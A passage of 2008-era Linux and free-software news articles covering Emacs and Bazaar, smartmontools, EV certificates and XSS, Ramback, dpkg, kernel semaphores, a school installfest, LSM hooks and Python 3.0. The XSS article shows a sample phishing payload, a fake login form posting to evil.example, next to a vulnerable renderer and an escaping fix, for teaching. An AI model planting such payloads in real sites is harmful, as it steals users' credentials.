As Thomas Lord (author of another GNU VCS, arch) points out, there is a cost to
agonizing over a choice like this:


Probably so but any group of smart people could easily spend
a year arguing about it.   Not even a year arguing about which system
is best but a year arguing just about what "best" means in this context.

Over-optimizing a choice like that can be a *huge* resource
suck and projects and groups fail all the time because of falling
into such traps.


No technical barriers to using Bazaar have been raised; it is, as Stallman
asserts, a fairly arbitrary choice.  Unsurprisingly, Stallman chooses the one
that serves his agenda.  The new maintainers, Stefan Monnier and Chong
Yidong, presumably agree with that
agenda; in any case, they have not indicated any resistance to the
choice.


So it seems that Emacs will be moving to Bazaar.  Jason Earl has been
pulling the CVS history into a Bazaar repository that should be available
soon.  The import process seems to be taking a fair amount of time—something on the order of a week—which is hopefully not indicative of
the operational speed of Bazaar.  Assuming the conversion works and
developers can get their work done using it, this would be a pretty
high-profile project to use it.   Other GNU software may follow suit, which
could be a big boost to the visibility of Bazaar, which is precisely
what Stallman was aiming for.


		Monitor disks with the S.M.A.R.T. monitoring tools


The 
S.M.A.R.T. Monitoring Tools (Smartmontools) is a cross-platform
set of utilities that are able to monitor operating data from
hard drives:


The smartmontools package contains two utility programs (smartctl and smartd) to control and monitor storage systems using the Self-Monitoring, Analysis and Reporting Technology System (SMART) built into most modern ATA and SCSI hard disks.
In many cases, these utilities will provide advanced warning of disk degradation and failure. It should run on any modern Darwin (Mac OSX), Linux, FreeBSD, NetBSD, OpenBSD, Solaris, OS/2, eComStation, QNX, or Windows system.


Wikipedia defines
SMART
as the Self-Monitoring, Analysis, and Reporting Technology:
"Mechanical failures, which are usually predictable failures, account for 60 percent of drive failure. The purpose of S.M.A.R.T. is to warn a user or system administrator of impending drive failure while time remains to take preventative action  such as copying the data to a replacement device. Approximately 30% of failures can be predicted by S.M.A.R.T."


Version 5.38 of Smartmontools was recently announced.  Improvements include:

Several Libata/Marvell driver improvements.
 New additions to the drive database.
 ATA-8 updates.
 New Dragonfly support.
 Support for the QNX operating system.
 A new no-fork option for smartd.
 Better support for systems with large numbers of disks.
 Improvements to the descriptions of the SMART Attribute list.
 A workaround for a Samsung firmware bug.
 Improvements to the CCISS support system.
 New selective self-test command line options.
 Build system portability improvements.
 Numerous bug fixes.


Building Smartmontools was straightforward.  The code was downloaded and
unpacked.  The usual configure, make and make install steps were
performed on an Ubuntu 7.04 system with no troubles.
The operation instructions from the README file were followed and
the software was able to discover data from the one hard drive on
the test system.  This
example output
shows the wide variety of drive information that Smartmontools
can display.  The drive appears to be healthy.


If you are a systems administrator who needs to keep track of hard
drive reliability data, Smartmontools should be able to provide
some useful drive information.  With the addition of a small
amount of glue-logic scripting, it should not be too difficult to
set up an automated drive monitoring system.
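
As a rough idea of what such glue might look like, here is a minimal sketch built around smartctl's -H (health) option.  The two function names are invented, the strings being matched are the health lines smartctl typically prints for ATA and SCSI drives (the exact wording may differ between versions and drive types), and running smartctl normally requires root privileges.

```python
import subprocess

def health_passed(smartctl_output):
    """Return True/False from `smartctl -H` text, or None if undetermined."""
    for line in smartctl_output.splitlines():
        if "overall-health" in line or "SMART Health Status" in line:
            return "PASSED" in line or line.rstrip().endswith("OK")
    return None

def check_drive(device):
    """Run `smartctl -H` on one device and interpret the result."""
    result = subprocess.run(["smartctl", "-H", device],
                            capture_output=True, text=True)
    return health_passed(result.stdout)
```

A cron job could call check_drive() on each disk (for example /dev/sda) and send mail whenever the result is anything other than True.  The smartd daemon shipped with the package covers much of the same ground, so a script like this is mostly of interest where custom reporting is wanted.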


		Extended Validation certificates and cross-site scripting


Cross-site scripting (XSS) is a frequent topic on security forums because
it is a common web application flaw that can lead to a variety of unpleasant
surprises.  One of the more frequently seen abuses of an XSS flaw is in the
aid of a phishing attack.  With the advent of Extended Validation (EV)
certificates coupled with the accompanying browser UI changes, some XSS attacks will
become much more powerful.


By now, most users are familiar with SSL certificates, which are used to
authenticate one or both sides of an HTTPS connection to the other.  EV
certificates are a step up from a 
more pedestrian SSL certificate as the recipient must undergo more scrutiny from the
certificate authority (CA) before being granted one.  We covered EV certificates in more
detail in November 2006, but they are just now starting to be installed
more widely.


Netcraft reported
the problem a few weeks ago with regard to sourceforge.net.  Sourceforge is one of
the 4,000 or so sites with an EV certificate, but it also has an XSS
problem.  So anyone using the site for XSS purposes now gets the benefit of
the higher trust that is supposed to be embodied in an EV certificate.


Browser vendors are being encouraged to highlight the EV certificates in
their UI so as to give users more confidence in those sites.  The most
recent Firefox 3 betas as well as IE7 are highlighting the site name in
green in the address bar to denote this higher trust.  Unfortunately, the
extra validation does not extend to testing the site for XSS flaws, which could
leave users easily fooled.


A phishing attack could use an XSS flaw in a search box or error message, for
example, to add content to the appearance of a site.  That content is really coming
from the XSS attack but it would appear under the "green means go" address
bar for the EV certificate-protected site.  That content could include a
login screen that sent the credentials elsewhere or a cookie stealing
attack for session hijacking.  For any site with sensitive information, XSS
attacks are already a problem; EV certificates just add another mechanism
for exploiting the user's trust.
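
To make the search-box scenario concrete, here is a minimal Python sketch
of a reflected XSS flaw and the usual fix.  The page fragment, the function
names and the evil.example URL are all invented for illustration; the only
real API used is html.escape() from the standard library.

```python
import html


def render_results_unsafe(query):
    # Vulnerable: the user-supplied query is pasted into the page verbatim,
    # so any markup it contains becomes part of the trusted site's page.
    return "<p>Results for: " + query + "</p>"


def render_results_safe(query):
    # Escaping turns markup characters into harmless character entities.
    return "<p>Results for: " + html.escape(query) + "</p>"


# A hypothetical phishing payload: a fake login form that posts elsewhere.
payload = ('<form action="https://evil.example/steal">'
           'Password: <input name="p"></form>')

print(render_results_unsafe(payload))  # the form is rendered under the green bar
print(render_results_safe(payload))    # the form shows up as inert text
```

Nothing in the EV vetting process checks whether a site's code looks like
the first function or the second.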


Much like the padlock icon that appeared many years
ago to denote a "secure" (really, just encrypted) connection, this new green address bar indicator is
somewhat difficult to explain.  Based on the vetting process for EV
certificates, there should be a real entity behind an EV
certificate—or at least there was one at the time of
issuance—but it is by no means an endorsement of the security of everything on a web
page that has one.  It is, like the original padlock, more nuanced than that.


Unfortunately, users are not good at security nuances.  They want yes or no
answers to "Is this site safe?"; that answer is nearly always "maybe" or
perhaps "probably".  At one time, the padlock icon was seen as a "yes" answer;
now the green address bar may take its place.  Somehow users need to be
taught to look beyond simple answers and websites need to clean up their
act so that their users are not scammed. 


The number of sites with XSS
problems is staggering (a look at xssed.com
is instructive) and new ones crop up all the time.
In many ways, XSS is an attack against users rather than directly against a
site.  This may make it less of a priority to fix than a direct attack,
like a SQL injection, might be.  That is very unfortunate for the users of
those sites, especially if the sites have a shiny new EV certificate.


		How to use a terabyte of RAM


We have not yet reached a point where systems - even high-end boxes - come
with a terabyte of installed memory.  But products like those from Violin Memory make it clear that
the day is coming; one can buy a Violin box with 500GB in it now.  So it
seems worth asking the question: once one has spent the not inconsiderable
sum to buy a box like that, what does one do with all that memory -
especially now that the Firefox developers have gotten serious about fixing
memory leaks?

Perhaps it's time for some wild ideas.  And there is no better source for
such ideas than Daniel Phillips, whose Ramback patch has stirred up a
bit of discussion this week.  The core idea behind Ramback is that all of
that memory is turned into a ramdisk, but with a persistent device attached
to it.  In normal conditions, all application I/O involves only the
ramdisk, and is, thus, quite fast ("Every little factor of 25
performance increase really helps.").  In the background, the kernel
worries 
about synchronizing data from the ramdisk onto permanent storage.  But the
synchronization process is mostly concerned with I/O performance, rather
than providing guarantees about just when any given block will make it onto
the disk platters.


Ramback thus differs from the normal block I/O caching done by the kernel
in a number of ways.  It keeps the entire device in memory, so that, in
steady-state operation, applications need never encounter a disk I/O
delay.  Should an application call fsync(), the expected result
(blocking until the data is written to physical media) will not happen.
Filesystems take great care to order operations in a way that minimizes the
risk of data loss in a crash; Ramback ignores all of that and writes data
to physical media in whatever order it decides is best.  As Daniel put it, the "most basic principle" of
Ramback's design is:


	[T]he backing store is not expected to represent a consistent
	filesystem state during normal operation.  Only the ramdisk needs
	to maintain a consistent state, which I have taken care to ensure.
	You just need to believe in your battery, Linux and the hardware it
	runs on.  Which of these do you mistrust?
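
The behavior described above can be modeled in a few lines of Python.
This is a toy sketch, not Ramback's code: the class and method names are
invented, a dictionary stands in for the backing disk, and "whatever order
is best" is approximated by sorting on block number.

```python
class WritebackRamdisk:
    """Toy model of a ramdisk that is lazily synced to a backing store."""

    def __init__(self, backing):
        self.backing = backing        # dict standing in for the disk
        self.ram = dict(backing)      # the whole device lives in memory
        self.dirty = set()            # blocks not yet written back

    def read(self, block):
        return self.ram[block]        # never touches the backing store

    def write(self, block, data):
        self.ram[block] = data
        self.dirty.add(block)

    def fsync(self):
        # Returns at once: no promise that anything has reached the disk.
        pass

    def flush_some(self, limit):
        # Background writeback picks blocks in an order that suits the
        # device (here: ascending block number), not the order of writes.
        for block in sorted(self.dirty)[:limit]:
            self.backing[block] = self.ram[block]
            self.dirty.discard(block)
```

Between calls to flush_some() the backing dictionary can hold any mixture
of old and new blocks, which is exactly the inconsistency the quote above
accepts.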


Ramback does include an emergency mode which will endeavor to bring the
disk up to date in a hurry should the UPS indicate that power has been
lost.  But that does not seem to be enough for everybody.
In the resulting discussion, nobody complained about the sort of
performance benefits that a tool like Ramback could provide.  But there was
a lot of concern about data integrity; it seems that many people distrust
their battery, their hardware, and Linux.  And that has led to a
sort of impasse, with several developers claiming that Ramback would be too
risky to use and Daniel dismissing their concerns as FUD.

FUD or not, those concerns are likely to be a difficult barrier for Ramback
to overcome.  Meanwhile, Daniel is looking for people to help test out the
code, but that presents challenges of its own:


	This driver is ready to try for a sufficiently brave developer.  It
	will deadlock and livelock in various ways and you will have to
	reboot to remove it.  But it can already be coaxed into running
	well enough for benchmarks, and when it solidifies it will be
	pretty darn amazing.


So far, reports from suitably courageous testers have been, well, scarce.
Your editor fears that this work could suffer the same fate as many of
Daniel's other patches: they can contain brilliant ideas and great coding
but just don't quite survive the encounter with the real, messy world.
But we need people thinking about how our systems will work in the
coming years; one hopes that Daniel won't stop.

		News from the Debian security team


A note from the Debian security
team shows a number of new initiatives and plans.  The team recently
expanded by two and is looking for up to two more folks to round it out.
That, coupled with a number of new initiatives, makes for some interesting
news from the Debian security world.


Adding people to the team adds
more eyes to find bugs, but, perhaps more importantly, adds more hands to
actually patch the code when bugs are found.  In many cases, the upstream
project will
fix the vulnerability in its latest release, leaving the distribution security team
to backport the fix into whatever version they are shipping.  This takes
knowledge; one must understand the code and how to build it for Debian. They
have not set the bar low for the kind of folks they are looking for:

You need to be familiar with how the wide variety Debian packages
  are maintained, patched and built. If you're not scared by
  packages generating their patch series by applying sed statements
  from cdbs include files before passing the patches through an
  awk filter to quilt until they're finally built with yada, you
  might be the right person.


The team is now using Request Tracker to track security bugs and updates.
Two separate categories have been established, one for upstream bugs that
are not yet public, the other for publicly known bugs.  This allows the
team to track all the bugs, but not prematurely release information about
security vulnerabilities that are not yet public.


Two other changes will help with the quality of security patches.  The
first is a public patch review mailing list that is being formed to allow
interested parties to see what patches are being proposed.  Presumably this
would only apply to public vulnerabilities or the list membership will need
to be tightly controlled.


The other quality-boosting change is to use the time between when a patch
is completed and when it has been ported and built for all of the
architectures to further test the patch.  The team is looking for large
installations that normally install security updates in their own test
environment before rolling them out to their live systems.  Leveraging
those test environments to further exercise the patched code can only lead
to better code in the long run.


Security is an important part of any distribution, so it is nice to see
these kinds of initiatives.  More team members, testing, and tracking are
all likely to bring about a faster and better response to security problems
in the future.


		Who maintains dpkg?


The Debian project is known for its public brawls, but the truth of the
matter is that the Debian developers have not lived up to that reputation
in recent years.  The recent outburst over the attempted "semi-hijacking"
of the dpkg maintainership shows that Debian still knows how to run a flame
war, though.  It also raises some interesting issues on how packages should
be maintained, how derivative distributions work with their upstream
versions, and what moral rights, if any, a program's initial author retains
years later.


Dpkg, of course, is the low-level package management tool used by
Debian-based distributions; it is the direct counterpart to the RPM tool
used by many other systems.  Like RPM, it is a crucial component in that it
determines how systems will be managed - and how much hair administrators
will lose in the process.  And, like RPM, it apparently causes a certain
sort of instability in those who work with it for too long.


Ian Jackson wrote dpkg back in 1993, but, by the time a few years had passed,
Ian had moved on to other projects.  In recent times, though, he
has come back to working on dpkg - but for Ubuntu, not for the Debian
project directly.  One of his largest projects has been the triggers
feature, which enables one package to respond to events involving other
packages in the system.  This feature, which is similar to the RPM
capability by the same name, can help the system as a whole maintain
consistency as the package mix changes; it can also speed up package
installations.  Triggers have been merged into Ubuntu's dpkg and are
currently being used by that distribution.


The upstream version of dpkg shipped by Debian does not have trigger
support, though, and one might wonder why.  If one listens to Ian's side of
the story, the merging of 
triggers has been pointlessly (perhaps even maliciously) blocked for
several months by Guillem Jover, the current Debian dpkg maintainer.  So
Ian concluded that the only way to get triggers into Debian in time for the
next release ("lenny") was to carry out a
"semi-hijack" of the dpkg package.  By semi-hijack, Ian meant that he
intended to displace Guillem while leaving in place the other developers
working on dpkg, who were encouraged to "please carry on with your
existing working practices."


Ian also proceeded to upload a version of dpkg with trigger support, and
without a number of other recently-added changes.  It is worth noting that
all of this work went into a separate repository branch, pending a final
resolution of the matter.  So when the upload was rejected (as it was) and
Ian was deprived of his commit privileges (as he was), there was no real
mess to clean up.


Those wanting a detailed history of this conflict can find it in this posting from Anthony Towns.  It is a long
story, and your editor will only be able to look at parts of it.


One of the relevant issues here is that Guillem Jover appears to be a busy
developer who has not had as much time to maintain dpkg as is really
needed.  Since the beginning of the year, he has orphaned a number of other
packages (directfb and bmv, for example) in order to spend more time on
dpkg.  But, as a result of time constraints, a number of dpkg patches have
languished for too long.  

While this was happening, Guillem put a fair amount of the time he did have
into reformatting the dpkg code and making a number of other low-level
changes, such as replacing zero constants with NULL.  Ian
disagrees strongly with the reformatting and such - unsurprisingly, the
original code was in his preferred style.
And this is where a lot of the conflict comes in, at two different levels.
Ian disagrees with the coding style changes in general, saying: 


	Everyone who works on free software knows that reformatting it is a
	no-no.  You work with the coding style that's already there.


Many developers will disagree on the value of code reformatting; some
projects (the kernel, for example) see quite a bit of it.  Judicious
cleaning-up of code can help with its long-term maintainability.  All will
agree, though, that reformatting can make it harder to merge large changes
which were made against the code before the reformatting was done.  This
appears to be a big part of Ian's complaint: unnecessary (to him) churn in
the dpkg code base makes it hard for him to maintain his trigger patches in
a condition where they can be merged.


Code churn is a part of the problem, but Ian's merge difficulties are also
a result of doing the trigger work in the Ubuntu tree rather than in Debian
directly.  Ian did try to
unify things back in August, but that was after committing Ubuntu to
the modified code.  Ubuntu's dpkg is currently significantly different from
Debian's version, and, while one assumes that, sooner or later, Debian will
acquire the trigger functionality, there is no real assurance that things
will go that way.  Dpkg has been forked, for now, and the prospects for a
subsequent join are uncertain.


Ian also asserts that, as the creator of dpkg, he is entitled to
special consideration when it comes to the future of that package.  His
semi-hijack announcement makes that point twice.  But one of the key features
of free software is this: when you release code under a free license,
you give up some control.  It seems pretty clear that Ian has long since lost
control over dpkg in Debian.


So who does control this package, and how will this issue be resolved?
Certainly Ian's hijack attempt found little sympathy, even among those who
think that dpkg has not been well maintained recently.  There are some who
say that the disagreement should be taken to the Debian technical committee, which
is empowered to resolve technical disputes between developers.  But faith
in this committee appears to be at a low point, as can be seen in this recent proposal to change how it is selected:


	 It's been pretty dysfunctional since forever, there's not much
	 that can be done internally to improve things, and since it's
	 almost entirely self-appointed and has no oversight whatsoever the
	 only way to change things externally is constitutional change.


Meanwhile, the discussion has gone quiet, suggesting that, perhaps, it has
been moved to a private venue.  The dpkg commit
log, as of this writing, shows that changes are being merged, but
triggers are not among them.  It is hard to imagine that the project will
fail to find a way to get the triggers feature merged and the maintenance
issues resolved, but that does not appear to have happened yet.

		Generic semaphores


Most kernel patches delete some code, replacing it with newer and
(presumably) better code.  Much of the time, it seems, the new code is more
voluminous than what came before.
Occasionally, though, a patch comes along which
deletes over 7600 lines of code - replacing it with a mere 314 lines -
while claiming to maintain the same functionality.  Matthew Wilcox's generic semaphore patch is one
of those changes.


In essence, a semaphore is a counter with a wait queue attached to it.
When kernel code wants to access the resource protected by a semaphore
sem, it makes a call to down(), passing a pointer to sem.


This call will check the counter associated with sem; if it is
greater than zero, the counter will be decremented and control returns to
the caller.  Otherwise the caller will be put to sleep until sometime in
the future when the counter has been increased again.  Increasing the
counter - when the protected resource is no longer needed - is done
with a call to up().  Semaphores can be used in any situation
where there is a need to put an upper limit on the number of processes
which can be within a given critical section at any time.  In practice,
that upper limit is almost always set to one, resulting in semaphores which
are used as a straightforward mutual exclusion primitive.


In current kernels, semaphores are implemented with highly-optimized,
architecture-specific code.  There are, in fact, more than twenty
independent semaphore implementations in the kernel code base.  Matthew's
patch rips all of that out and replaces it with a single, generic
implementation which works on all architectures.  After the patch is
applied, a semaphore is a small structure holding a spinlock, a counter
(count), and a list of waiting processes (wait_list).


The implementation follows from this definition in a straightforward way:
the spinlock is used to protect manipulations of count, while
wait_list is used to put processes to sleep when they must wait
for count to increase.  The actual code, of course, is somewhat
complicated by performance and interrupt-safety considerations, but it
remains relatively short and simple.
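
For readers who want to see the shape of such an implementation, here is a
user-space analogue in Python.  It is a sketch of the general technique
only, not the kernel code: a threading.Lock stands in for the spinlock,
each sleeping caller is represented by an Event on wait_list, and the class
name is invented.

```python
import threading
from collections import deque


class GenericSemaphore:
    def __init__(self, count=1):
        self.lock = threading.Lock()   # stands in for the spinlock
        self.count = count             # how many more callers may enter
        self.wait_list = deque()       # one Event per sleeping caller

    def down(self):
        with self.lock:
            if self.count > 0:
                self.count -= 1        # fast path: take a slot and return
                return
            waiter = threading.Event()
            self.wait_list.append(waiter)
        # Sleep outside the lock; up() hands its slot directly to us.
        waiter.wait()

    def up(self):
        with self.lock:
            if self.wait_list:
                # Wake the oldest waiter instead of raising the count.
                self.wait_list.popleft().set()
            else:
                self.count += 1
```

Creating the object with count=1 gives the mutual exclusion behavior that
most semaphore users actually want.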

One might ask: why weren't semaphores done this way in the first place?
The answer is that, once upon a time (prior to 2.6.16), semaphores were one
of the primary mutual exclusion mechanisms in the kernel.  The 2.6.16 cycle
brought in mutexes from the realtime tree, and most semaphore users were
converted over.  So semaphores, which were once a performance-critical
primitive, are now much less so.  As a result, any need there may have been
for carefully hand-tuned, architecture-specific code is gone.  So the code
might as well go too.

The other question which comes up is: why are semaphores still being used
at all?  The number of semaphore users has dropped considerably since
2.6.16, but there are still a number of them in the kernel.  Some of those
could certainly be converted to mutexes, but doing so requires a careful
audit of the code to be sure that the semaphore's counting feature is not
being used.  Once that work is done, it may turn out that, in some places,
a semaphore is truly the right data structure.  So semaphores are likely to
remain - but they'll require rather less code than before.

		Installfest generates 350 Linux computers for schools


On Saturday March 1st, Untangle and the Alameda County Computer
Resource Center (ACCRC) organized the first of what is hoped to be many
"Installfest for Schools" events.  It took place at four San Francisco Bay area
locations (San Francisco, Berkeley, San Mateo and Novato) and refurbished
350 older computers with Ubuntu for northern California schools.


The primary goal of the installfest was to give children in
disadvantaged neighborhoods the same access to technology that students in
wealthy school districts grow up with.  However, the event was also about
curbing waste.  132 million PCs were bought in the year 2000 alone and none
of them can run Vista.  But older hardware works great with GNU/Linux and
extending the life of these PCs will keep thousands of tons of toxic
electronic waste out of the landfill.  And let's not forget about budgetary
waste.  With many states facing budget crises that will inevitably force
deeper classroom spending cutbacks, why should our schools spend their
scarce resources on proprietary software licenses?   In fact, cutbacks may
create an incredible window of opportunity for the GNU/Linux desktop
movement to establish itself within schools. 


The installfest drew approximately 130 free and open source software community
volunteers across the four locations.  We started with over 1,000 older,
discarded computers that had been collected by ACCRC through donations
from the general public, local businesses and municipal governments.  Some
of the computers were smooth sailing: they met the hardware specification, had all
of the necessary components and installed without any problems.  Other
computers had software install problems, but those were easy to solve
because so many of the Bay Area's most hardcore free and open source software gurus participated
and with their combined expertise, no error message went unattended to.
The rest of the computers required a little more care, as many of them were
missing a hard drive, NIC or enough RAM to run Ubuntu.  Yet, by
disassembling problematic boxes it was easy to form a pool of spare parts that
could then be stitched back together to create working computers.  The week
after the installfest, ACCRC put the finished systems through a 72-hour
burn-in test and we now have 350 computers that have already started being
donated to schools.  


The Ascend School in Oakland received the first batch of nine computers.
Other schools that have received open source computers from the ACCRC
include:

Lockwood School (Oakland) 
Whittier Elementary School (Oakland) 
Casa Grande High School (Petaluma)
Woodside Elementary School (Concord)
KIPP San Francisco Bay Academy (San Francisco) 
Mission High School (San Francisco)    

This event was about donating open source computers to schools in Northern
California.  However, ACCRC regularly donates to schools nationwide
(and sometimes internationally).  Schools in need of computers should fill
out ACCRC's school
application form [PDF].


Computer hardware and software specifications


The minimum specifications for each computer were an 800MHz processor (PIII or AMD),
256MB of RAM and a 20GB hard drive, but we were pleasantly surprised to find a
handful of P4 processors in the mix as well.  One location even received a
batch of 6 dual core systems with elegant slim cases—who throws those out
and what else are they looking to get rid of?—but ironically we couldn't
install them during the event because they were only equipped with DMS-59
DVI ports that required special monitor cables. 


Each system received a fresh copy of Ubuntu 7.10 desktop with the latest
apt-get upgrade applied as of February 27, 2008.  Because the computers
were going into schools with little or no GNU/Linux expertise, it was
important to try and create a positive first experience so we worked with
Creative Commons to package samples of pictures from Flickr and music
from Jamendo to show off the fun side of the donated computers.  No
Starch Press also donated PDF copies of Ubuntu for non-Geeks that were
loaded on to each computer so that help for common support questions was never
more than a click away. 

Install specifications

Each location was set up with 10 to 40 workstations that had permanent
keyboards, mice, monitors and cables so that the volunteers only had to
move the desktops themselves back and forth.  The process was started by
booting from custom install CDs and the packages were applied over the
network via Apache HTTP servers.  The custom CDs were optimized to make
the Ubuntu OS installation as fast and easy as possible.  Physically
placing the CD into the drive and booting from disc was really all that was
required because the additional content from Creative Commons and No Starch
Press was bundled as Debian packages that were automatically installed via
the network just like the other Ubuntu updates and patches. 


The installfest networks were based on dual Pentium III servers with a RAID array and Gigabit network cards plugged into a 24-port Gigabit
switch.  It was important to have a fast setup because updating as many as
40 systems at once placed a heavy load on drives and network connections.
Electricity was also a concern as most of the outlets available had 15 or
20 Amp circuits.    Given the intensity of the installation/reboot workload
and the relatively power inefficient CRT monitors, we drew the line at 5
workstations per 15 Amp circuit because an extra machine might have fit,
but blowing the circuit breaker would have caused a big
disruption—especially if the breaker happened to be in a locked closet.  

Community goes the extra mile

With 130 volunteers showing up, Untangle and ACCRC really had a lot of help
in pulling the Installfest for Schools off.  However, the community did far
more than just show up; our volunteers really went the extra mile to save
the day as we stumbled across a handful of unexpected hiccups.  One
particularly inspirational moment came when the San Mateo location ran out
of computers: our volunteers drove their own cars across the Bay to pick up
extra hardware rather than close the location early!  We also owe a debt of
gratitude to 3 members of the San Francisco Linux Users' Group (Christian
Einfeldt, Jim Stockford and Daniel Mizyrycki), who worked long hours to set up
and clean up that location.   


We also received lots of help from free and open source software related
organizations.  Mozilla in
particular really stepped up to the plate by blogging about the event and then
bringing schwag and pizza for all 130 volunteers!  But Mozilla wanted to
get their hands dirty as well and Mozilla team members showed up to lend a
hand at each location.  Creative Commons and the No Starch Press helped
put together content.  Also, O'Reilly,
OSI, the Linux Foundation, Sun and
Canonical really helped get the word out with supportive blog mentions that
encouraged participation as well.

Future plans

Moving forward, Untangle and ACCRC hope to continue organizing bigger
and better Installfests for Schools.  Our goal is to turn the one-time
regional event into a distributed national event occurring on a regular
basis.  If we're able to find some friendly organizations to help out,
we may even be able to go international.  Stay tuned because you'll be
hearing from us sooner rather than later about the next Installfest for
Schools.  


Anyone wishing to help should stay informed by signing up for the
installfest mailing list.  As we move more into a distributed
national event, we need all of the help that we can get identifying local
schools, old computer donors and feet on the street volunteers to make sure
everything goes smoothly.  That work will be coordinated on the mailing list.


[ Andrew Fife, of Untangle, is one of the organizers of the project. ]

		The return of authoritative hooks


The containers developers have what would seem to be a relatively
straightforward problem: they would like to control access to devices on a
per-container basis.  Then containers could safely be granted access to
specific devices without compromising the overall security of the system -
even if a container has a root-capable process which can create new device
files.  Implementing this feature has been a longer journey than these
developers had imagined, though, with the "device whitelist" feature being
sent around to different kernel subsystems almost like one of those famous
garbage barges from years past.  A final resting place may have been found, though, and it
may signal a change in how some security decisions are made in the kernel
in the future.


The original version of the
patch, posted by Pavel Emelyanov, set up a control group for the management
of device accessibility within containers.  The actual rules - and their
enforcement - were stored deep within the device model subsystem.  This
drew an objection from Greg Kroah-Hartman, who suggested that, instead,
this kind of access control should be done either with udev or with the Linux
security module (LSM) subsystem.  Udev does not give the desired degree of
control and, apparently, can be problematic for those wanting to run older
distributions within containers, so it was not seriously considered.  The
LSM suggestion was, after some resistance, taken to heart, though.


The result was the device
whitelist LSM patch, posted by Serge Hallyn.  It was a stacking
security module which made changes to a number of hooks.  This is where
James Morris came in and suggested that,
instead, the whitelist should just be added to the existing capabilities
security module.  Then there would be no need for a separate module and
things could be generally simplified.


So Serge duly rolled out version 3 of the
patch which moved the whitelist into the capabilities module.  But this
one ran into resistance as well.  Quoting James
Morris again:


	Moving this logic into LSM means that instead of the cgroups
	security logic being called from one place in the main kernel
	(where cgroups lives), it must be called identically from each LSM
	(none of which are even aware of cgroups), which I think is pretty
	obviously the wrong solution.


Casey Schaufler also didn't like this idea:


	When the next feature comes along are we going to stuff it into
	capabilities, too? Maybe we'll cram it into audit or CIPSO instead,
	but how long can this go on?  Eventually we need a mechanism that
	allows more or less general mix-and-match, maybe with a few rules
	like "don't mix plaids and stripes" to keep things sane or these
	lesser facilities have no chance. Seems like we're still making LSM
	too hard to use


At this point, the complaint was clearly not with just the device
whitelist, but with the capabilities module as well.  It seems that
capabilities are a bit of a poor fit with the LSM idea as a whole.  The
fact that they exist at all is a bit of a historical artifact; some
developers wanted to see them implemented that way to show the flexibility
of the LSM interface and to let capabilities be omitted from embedded
setups.  As it happens, it's still not possible to remove capabilities, and
they impose a bit of a cost on all other security modules.


The core problem is this: LSM, fundamentally, is a restrictive mechanism.  An
LSM hook can deny an action, but it can never empower a process to do
something it would not have been allowed to do in the absence of the
security module.  The decision to disallow "authoritative hooks" was made explicitly back in
2001 as a way of restricting the scope of LSM modules and, hopefully,
ensuring that those modules would not themselves become security problems.


But capabilities are an inherently authoritative mechanism - a capability
check verifies the existence of a special permission which would otherwise
not be there.  The device whitelist is the same sort of thing: it grants
access which would otherwise be denied.  So it fits poorly with the LSM
model.
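
The distinction between the two kinds of hook can be sketched in a few
lines of Python.  This is purely illustrative: the function names are
invented, a request is just a tuple, and the whitelist entry (character
device 1:3) is an arbitrary example rather than anything from the patches.

```python
def restrictive_check(base_allowed, hooks, request):
    # LSM-style: hooks are consulted only to veto; they can never turn
    # a "no" from the base permission check into a "yes".
    return base_allowed and all(hook(request) for hook in hooks)


def authoritative_check(base_allowed, hooks, request):
    # Authoritative: a hook may grant access the base check refused.
    return base_allowed or any(hook(request) for hook in hooks)


# Hypothetical per-container whitelist: (type, major, minor) tuples.
whitelist = {("c", 1, 3)}


def whitelist_hook(request):
    return request in whitelist


request = ("c", 1, 3)
# Suppose the ordinary checks would refuse this container the device:
print(restrictive_check(False, [whitelist_hook], request))    # False
print(authoritative_check(False, [whitelist_hook], request))  # True
```

Under the restrictive rule the whitelist can never do its job, which is why
it keeps getting pushed out of LSM.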


Serge came back with yet another
patch which takes the whitelist code out of the LSM framework and,
instead, inserts a separate set of hooks into the relevant places in the
code.  Those hooks sit right next to the LSM hooks, but operate in a
permissive manner.  So far, this approach seems to be passing muster, with
no developers (yet) talking about booting it out into yet another
subsystem.


Things may yet change, though.  Casey Schaufler is now talking about the creation of a "Linux
privilege module" framework for the management of all permissions checks.
The normal discretionary access control checks could be moved there, as
could all capability and "are they root?" logic.  And, of course, the
device whitelist code.  Nobody has really spoken out against this idea -
but, then, nobody has seen any code yet either.  But, if things continue in
this direction, authoritative hooks may have finally found a home, many
years after having been rejected from the LSM mechanism.

		Python gears up for 2.6 and 3.0


Things are heating up in the Python world in advance of two major
synchronized releases of the language.  As it heads towards Python 3000
(aka Py3k or Python 3.0), alongside the transitional version 2.6, the development team is narrowing its focus to
just those items that are required for the releases.  Along the way, the
conversations taking place on python-devel provide a look inside the
development and release process decisions that a project needs to make as
releases loom.


Py3k is the next-generation version of Python, as we described last September.  It
will not be backward compatible with programs written for Python 2.x in a
wide variety of ways.  Python 2.6 is an effort to bridge the gap, enabling
much of the 3.0 functionality so that new programs can start using it.  It
can also provide warnings for code that will not work with Py3k.


Python 2.6 was originally scheduled for an April 2008 release, in advance of the August
2008 release planned for Py3k.  Now the two are slated for synchronized
releases, roughly monthly, until the final release now scheduled for early
September 2008.  The synchronization is seen as important for two reasons,
as Python's Benevolent Dictator For Life (BDFL) Guido van Rossum outlines:

Not only could
this potentially save the release manager and his assistants some
time, doing the final releases together sends a clear signal to the
community that both versions will receive equal support.


Because Py3k is such a radical change, the 2.x series will continue for a
long time.  van Rossum's recent PyCon keynote (PDF
slides) mentions five years as the time frame for 2.6 to be supported,
with 2.7 and 2.8 releases possible.  A stable development platform for the
next few years is very important for current Python users, as is giving
them a long time to migrate their code.


The third alpha of Py3k was released at the end of February along with the first
alpha of 2.6.  Additional alpha releases of each are slated for April and
May as laid out in Python Enhancement Proposal
(PEP) 361.  Those are to be followed by betas in June and July with the
final release planned for September 3.  All of that adds up to a fairly
aggressive schedule, but the team seems confident—at least so far.


One of the issues that the Python hackers are trying to figure out is how
to track the items still left to be done.  van Rossum describes the scope
of the
problem:

In order to make such a tight release schedule we should try to come
up with a list of tasks that need to be done, and prioritize them.
This should include documentation, and supporting tools like 2to3. It
should include features, backports of features, cleanup, bugs, and
whatever else needs to be done (e.g. bugbot maintenance).


No one had any major objections to van Rossum's suggestion of using the bug tracker to track the tasks, with
Christian Heimes pointing out:

Despite the url bugs.python.org it's an issue tracker and not a bug
tracker. We track patches, feature requests, ideas and bugs in the same
tracker.


The bug tracker allows for different priorities to be set on bugs (or
tasks) that are entered into it, which led van Rossum and others to wonder
about the proper usage of that field.  One of the problems is
distinguishing between issues that must be addressed before the next
release versus those that must be addressed sometime before the final
